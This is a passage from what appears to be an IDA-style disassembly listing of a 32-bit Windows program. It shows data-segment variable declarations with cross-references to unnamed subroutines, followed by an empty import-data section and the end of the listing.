off_433C64 dd offset off_420BCC ; DATA XREF: sub_41C370+B0�o
; sub_41C370+BA�w
dword_433C68 dd 2080Ah ; DATA XREF: sub_41A9DE+4FD�r
; sub_41C370+CE�w
off_433C6C dd offset off_420D24 ; DATA XREF: sub_41C370+F6�o
; sub_41C370+100�w
off_433C70 dd offset off_420D2C ; DATA XREF: sub_41C370+112�o
; sub_41C370+11C�w
off_433C74 dd offset off_420D1C ; DATA XREF: sub_41C370+DA�o
; sub_41C370+E4�w
dword_433C78 dd 1 ; DATA XREF: sub_403DA0�r sub_40A6DB�w ...
dword_433C7C dd 1 ; DATA XREF: sub_407370+28�r
; sub_407B70+1E�r ...
dword_433C80 dd 0 ; DATA XREF: sub_40A42B+34�r
dword_433C84 dd 20h ; DATA XREF: sub_4087E0+3C�w
; sub_4087E0+BF�w ...
dd 6 dup(0)
dword_433CA0 dd 0BC20B0h ; DATA XREF: sub_4067D6+FD�r
; sub_40808A+87�r ...
dd 3Fh dup(0)
dword_433DA0 dd 0BC3188h ; DATA XREF: sub_40808A+2B�w
; sub_40808A+44�w ...
dd 7 dup(0)
dword_433DC0 dd 400h dup(0) ; DATA XREF: .data:off_423950�o
; .data:00423958�o
dword_434DC0 dd 200h ; DATA XREF: sub_40808A�r
; sub_40808A:loc_4080A4�w ...
dword_434DC4 dd 0 ; DATA XREF: sub_407B65�w
dword_434DC8 dd 1 ; DATA XREF: sub_40ABE1+B3�w
dword_434DCC dd 0BC310Ch ; DATA XREF: sub_402D09+10�r
; sub_402D09+9B�w ...
dword_434DD0 dd 0BC3100h ; DATA XREF: sub_402D09+5�r
; sub_402D09+87�w ...
dword_434DD4 dd 1 ; DATA XREF: sub_404E03�r
; sub_404E03+11�w ...
dword_434DD8 dd 0 ; DATA XREF: sub_407979:loc_4079E2�r
; sub_407979+74�o ...
dword_434DDC dd 0 ; DATA XREF: sub_405ADD+28�w
; sub_405B25�r ...
dword_434DE0 dd 0 ; DATA XREF: sub_405ADD+15�w
; sub_405B25+6�r ...
dword_434DE4 dd 0 ; DATA XREF: sub_403691+13�r
; sub_405ADD+36�w ...
dword_434DE8 dd 0 ; DATA XREF: sub_405ADD+2F�w
; sub_405B50+2FC�w ...
dword_434DEC dd 0 ; DATA XREF: sub_405ADD+3C�w
; sub_405E64�r ...
dword_434DF0 dd 0 ; DATA XREF: sub_405B50+229�r
; sub_405B50+249�r ...
dword_434DF4 dd 1 ; DATA XREF: sub_402A45:loc_402A7E�r
; sub_403603+13�r ...
dword_434DF8 dd 442340h ; DATA XREF: .text:0040404B�w
; sub_40AB84:loc_40AB95�r ...
_data ends
; Section 5. (virtual address 0003D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0003D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 43D000h
align 2000h
_idata2 ends
end start